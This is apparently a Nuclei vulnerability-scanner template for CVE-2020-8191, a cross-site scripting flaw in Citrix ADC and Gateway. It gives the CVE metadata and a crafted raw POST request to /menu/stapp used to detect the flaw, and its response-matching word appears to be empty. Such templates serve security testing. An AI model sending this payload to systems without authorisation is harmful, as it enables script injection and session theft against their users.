id: CVE-2020-8191 info: name: Citrix ADC/Gateway - Cross-Site Scripting author: dwisiswant0 severity: medium description: | Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 contain a cross-site scripting vulnerability due to improper input validation. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability. reference: - https://support.citrix.com/article/CTX276688 - https://nvd.nist.gov/vuln/detail/CVE-2020-8191 - https://github.com/Elsfa7-110/kenzer-templates - https://github.com/jweny/pocassistdb - https://github.com/stratosphereips/nist-cve-search-tool classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-8191 cwe-id: CWE-79 epss-score: 0.0021 epss-percentile: 0.58946 cpe: cpe:2.3:o:citrix:application_delivery_controller_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: citrix product: application_delivery_controller_firmware tags: cve,cve2020,citrix,xss http: - raw: - | POST /menu/stapp HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded X-NITRO-USER: xpyZxwy6 sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 490a0046304402206617e4956f9404435cacd0175a72eb6deb5b1eead694622dc445086a67a221db022072a353f4336bd25c50f2cafca5951b2056e8b0e4937b2ae92d665df184f60d69:922c64590222798bb761d5b6d8e72950